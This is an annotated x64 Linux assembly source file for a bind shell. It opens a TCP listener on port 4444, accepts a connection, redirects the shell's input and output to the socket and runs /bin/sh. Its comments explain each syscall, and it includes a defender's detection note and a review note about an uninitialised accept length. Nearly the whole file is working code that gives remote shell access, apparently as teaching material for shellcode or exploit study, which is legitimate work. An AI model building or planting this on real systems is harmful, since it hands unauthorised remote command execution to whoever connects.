;-----------------------------------------------------------------------
; Program to accept a TCP connection and provide a shell on x64 Linux
; Author: illustrissimus
;
; To build and run:
;   nasm -f elf64 -o bs.o bs.asm
;   ld -o bs bs.o; strip -s bs
; To inspect:
;   objdump -M intel -d bs
;
; Syntax: NASM (Intel), x86-64 Linux, raw syscalls only (no libc).
; Syscall ABI: rax = number; args rdi, rsi, rdx, r10, r8, r9; result in
;              rax; `syscall` clobbers rcx and r11. No `call` is ever made,
;              so stack alignment is irrelevant here, and the 128-byte red
;              zone below rsp is written before rsp is lowered onto it.
; Flow:   socket -> bind(0.0.0.0:4444) -> listen -> accept -> close(listener)
;         -> dup2 client fd onto fds 0/1/2 -> execve("//bin/sh")
; Caveat: no syscall return value is checked; a failed socket/bind/listen/
;         accept still falls through to the dup2 and execve calls.
; Detection note (defender's view): a listener on 0.0.0.0:4444 and a shell
;         whose stdin/stdout/stderr are a socket are the observable artefacts
;         of this textbook bind-shell pattern.
;
; Register roles:
;   rdi = listening socket fd after socket(); client fd after accept()+close()
;   r9  = client fd while the listening socket is being closed
;   rsp = points at the sockaddr_in for bind, then at accept scratch space
;-----------------------------------------------------------------------
default rel
global _start

section .text

_start:
        ; create socket: socket(AF_INET, SOCK_STREAM, 0)
        mov     rax, 41                     ; socket
        mov     rdi, 2                      ; domain = AF_INET
        mov     rsi, 1                      ; type = SOCK_STREAM
        mov     rdx, 0                      ; protocol = 0 (default for SOCK_STREAM, i.e. TCP)
        syscall
        mov     rdi, rax                    ; store the socket FD in RDI

        ; bind the socket
        ; prepare the sockaddr_in (16 bytes) in the red zone, then lower rsp onto it:
        ;   [rsp-8] u16   sin_family = AF_INET
        ;   [rsp-6] u16   sin_port   = htons(4444)
        ;   [rsp-4] u32   sin_addr   = 0.0.0.0 (INADDR_ANY)
        ;   [rsp+0] u8[8] sin_zero   = 0 (the eight zero bytes just pushed)
        xor     rax, rax
        push    rax                         ; sin_zero = 0
        mov     dword [rsp-0x4], eax        ; sin_addr = 0.0.0.0
        ; import socket \n hex(socket.htons(4444))
        mov     word [rsp-0x6], 0x5c11      ; sin_port = 4444 (network byte order, stored little-endian)
        mov     word [rsp-0x8], 0x2         ; sin_family = AF_INET
        sub     rsp, 0x8                    ; rsp -> start of the struct
        ; make the call: bind(fd, &sockaddr_in, 16)
        mov     rax, 49                     ; bind
        ; RDI already contains the socket FD
        mov     rsi, rsp                    ; addr -> sockaddr_in
        mov     rdx, 0x10                   ; addrlen = 16
        syscall

        ; listen on the socket: listen(fd, 1)
        mov     rax, 50                     ; listen
        ; RDI already contains the socket FD
        mov     rsi, 1                      ; backlog = 1
        syscall

        ; accept the TCP connection: accept(fd, &addr, &addrlen)
        mov     rax, 43                     ; accept
        ; RDI already contains the socket FD
        sub     rsp, 0x10                   ; reserve 16B on the stack (never written; kernel fills it)
        mov     rsi, rsp                    ; addr, populated when the client connects
        mov     byte [rsp-0x1], 0x10        ; addrlen = 16
        sub     rsp, 0x1
        mov     rdx, rsp                    ; addrlen -> socklen_t (4 bytes) at [rdx]
        ; NOTE(review): only the low byte of the 4-byte socklen_t at [rdx] is
        ; initialised; its upper 3 bytes overlap the uninitialised 16-byte addr
        ; buffer above, so the length the kernel reads is not reliably 16.
        syscall
        mov     r9, rax                     ; store the client socket FD in R9

        ; close the listening socket: close(fd)
        mov     rax, 3                      ; close
        ; RDI already contains the socket FD
        syscall
        mov     rdi, r9                     ; RDI contains the client socket FD from now on

        ; duplicate file descriptors: dup2(client, 0/1/2) so the shell's
        ; stdin/stdout/stderr all refer to the socket
        mov     rax, 33                     ; dup2
        ; RDI already contains the client socket FD
        mov     rsi, 0x0                    ; newfd = stdin
        syscall
        mov     rax, 33                     ; dup2 (rax was overwritten by the previous return value)
        mov     rsi, 0x1                    ; newfd = stdout
        syscall
        mov     rax, 33                     ; dup2
        mov     rsi, 0x2                    ; newfd = stderr
        syscall

        ; execute /bin/sh: execve("//bin/sh", NULL, NULL)
        mov     rax, 59                     ; execve
        xor     rbx, rbx                    ; NULL terminator
        push    rbx
        mov     rbx, 0x68732f6e69622f2f     ; "hs/nib//" as a little-endian qword -> "//bin/sh" in memory
        push    rbx
        mov     rdi, rsp                    ; filename -> "//bin/sh\0"
        xor     rsi, rsi                    ; argv = NULL
        xor     rdx, rdx                    ; envp = NULL
        syscall

        ; exit the program (only reached if execve returned, i.e. failed)
        mov     rax, 60                     ; exit
        mov     rdi, 0                      ; exit code
        syscall